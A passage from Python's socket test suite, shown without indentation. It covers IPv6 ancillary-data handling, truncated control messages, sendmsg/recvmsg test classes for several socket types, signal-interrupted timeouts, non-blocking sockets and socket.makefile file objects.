tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(None)
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(10)
self.assertTrue(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 10)
if fcntl:
# When a Python socket has a non-zero timeout, it's
# switched internally to a non-blocking mode.
# Later, sock.sendall(), sock.recv(), and other socket
# operations use a `select()` call and handle EWOULDBLOCK/EGAIN
# on all socket operations. That's how timeouts are
# enforced.
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
